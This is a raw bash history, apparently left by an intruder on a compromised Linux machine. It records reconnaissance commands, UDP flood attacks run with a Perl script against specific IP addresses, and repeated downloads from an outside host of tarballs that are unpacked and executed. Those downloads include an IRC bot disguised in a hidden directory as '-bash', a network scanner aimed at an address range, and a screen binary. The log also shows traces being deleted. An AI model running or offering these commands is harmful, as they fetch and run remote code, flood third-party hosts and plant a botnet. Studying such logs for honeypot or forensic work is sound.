w
uname -a
wget
cd /var/tmp
ls
perl udp.pl 9.169.172.148 20 20
ps -x
ps aux
perl udp.pl 203.207.78.199 0 0 
w
uname -a
wget cool.amigo.hu/alecs.tar.gz
wget cool.amigo.hu/alecs.tgz
tar xzvf alecs.tgz 
cd alecs
./a1
./a2
ls -a
cd ..
rm -rf alecs
rm -rf alecs.tgz 
ls -a
cat .bash_history 
wget cool.amigo.hu/teambot.tar.gz
tar xvzf teambot.tar.gz 
cd "..   "/
./-bash 
ls -a
ps -x
cd ..
wget cool.amigo.hu/scan.tar.gz
tar xvzf scan.tar.gz 
cd zzz/
./a
./a 1
screen
wget cool.amigo.hu/screen.tgz
tar xvzf screen.tgz 
chmod +x screen
./screen 
./a 61.129
./a 61.129
